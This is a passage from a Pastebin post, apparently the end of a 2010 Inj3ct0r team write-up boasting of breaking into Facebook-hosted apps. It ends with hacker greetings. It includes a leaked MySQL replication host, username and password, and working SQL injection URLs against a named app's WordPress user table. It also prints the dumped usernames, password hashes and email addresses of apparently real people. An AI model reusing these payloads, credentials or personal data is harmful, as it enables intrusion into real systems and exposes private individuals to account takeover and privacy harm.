  836. binlog-do-db=fluff2
  837.  
  838. expire-logs-days=14
  839.  
  840.  
  841.  
  842. server-id = 5
  843.  
  844.  
  845.  
  846. #master-host=69.63.176.141
  847.  
  848. #master-user=romis_user
  849.  
  850. #master-password=romis0123
  851.  
  852. #master-connect-retry=60
  853.  
  854. replicate-do-db=miserman
  855.  
  856.  
  857. #log-slave-updates
  858.  
  859. expire_logs_days = 14
  860.  
  861.  
  862. I think we found a sufficient number of vulnerabilities!
  863.  
  864. ---------------------------
  865.  
  866. __ __ __
  867. /'__`\ /'__`\ /'__`\
  868. /\ \/\ \ __ _/\ \/\ \/\_\L\ \
  869. \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
  870. \ \ \_\ \/> </\ \ \_\ \/\ \L\ \
  871. \ \____//\_/\_\\ \____/\ \____/
  872. \/___/ \//\/_/ \/___/ \/___/
  873. [Inj3ct0r Crash Exploit]
  874.  
  875.  
  876.  
  877. So .. Moving on to the fun friends
  878.  
  879. To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
  880.  
  881. ..> Inj3ct0rExploit start . + . + . + . + . + . + .
  882.  
  883. wp_posts
  884.  
  885. post_password
  886.  
  887. wp_users
  888.  
  889. user_pass
  890.  
  891. done.....
  892.  
  893.  
  894. WordPress! oO one of the modules installed in facebook is Wordpress!
  895.  
  896.  
  897. check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
  898.  
  899.  
  900. oooooooooooooooooooooooooooo
  901.  
  902. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  903.  
  904. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  905.  
  906. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  907.  
  908. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  909.  
  910. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
  911.  
  912. 3 <= ALERT! Users! =]
  913.  
  914. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  915.  
  916. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
  917.  
  918. oooooooooooooooooooooooooooo
  919.  
  920. ..> Inj3ct0r_Crach_exploit [ENTER]
  921.  
  922. user:
  923.  
  924. admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
  925. lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
  926. tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
  927.  
  928. cracker:
  929.  
  930. admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
  931. lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
  932. tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
  933.  
  934. see request:
  935.  
  936.  
  937. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
  938. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
  939. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
  940.  
  941.  
  942.  
  943. goOd =] Nice Hacking old school xD
  944.  
  945.  
  946. __ __ __ __
  947. /'__`\ /'__`\/\ \\ \
  948. /\ \/\ \ __ _/\ \/\ \ \ \\ \
  949. \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
  950. \ \ \_\ \/> </\ \ \_\ \ \__ ,__\
  951. \ \____//\_/\_\\ \____/\/_/\_\_/
  952. \/___/ \//\/_/ \/___/ \/_/
  953. [Conclusion]
  954.  
  955.  
  956.  
  957. There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
  958.  
  959.  
  960.  
  961. __ __ ______
  962. /'__`\ /'__`\/\ ___\
  963. /\ \/\ \ __ _/\ \/\ \ \ \__/
  964. \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
  965. \ \ \_\ \/> </\ \ \_\ \/\ \L\ \
  966. \ \____//\_/\_\\ \____/\ \____/
  967. \/___/ \//\/_/ \/___/ \/___/
  968. [Greetz]
  969.  
  970.  
  971.  
  972. Greetz all Member Inj3ct0r.com
  973.  
  974. Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]
  975.  
  976. Personally h4x0rz:
  977.  
  978. 0x1D, Z0m!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..
  979.  
  980. You are good hackers. Respect y0u!
  981.  
  982. Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
  983.  
  984.  
  985. At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip
  986.  
  987. We want to thank the following people for their contribution.
  988.  
  989. Do not forget to keep track of vulnerabilities in Inj3ct0r.com
  990.  
  991. GoOd luck Hackers! =]
  992.  
  993.  
  994. # Inj3ct0r.com [2010-04-06]
  995.  
  996. http://foro.elhacker.net/hacking_basico/facebooks_servers_was_hacked_by_inj3ct0r_team_hack_of_the_year-t298374.0.html#ixzz1UeiTGLEP
  997.  
  998.  
  999.  
  1000.  
  1001.  
  1002.  
  1003.  
  1004.  
  1005.  
  1006.  
  1007. If this is real, good work, guys...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!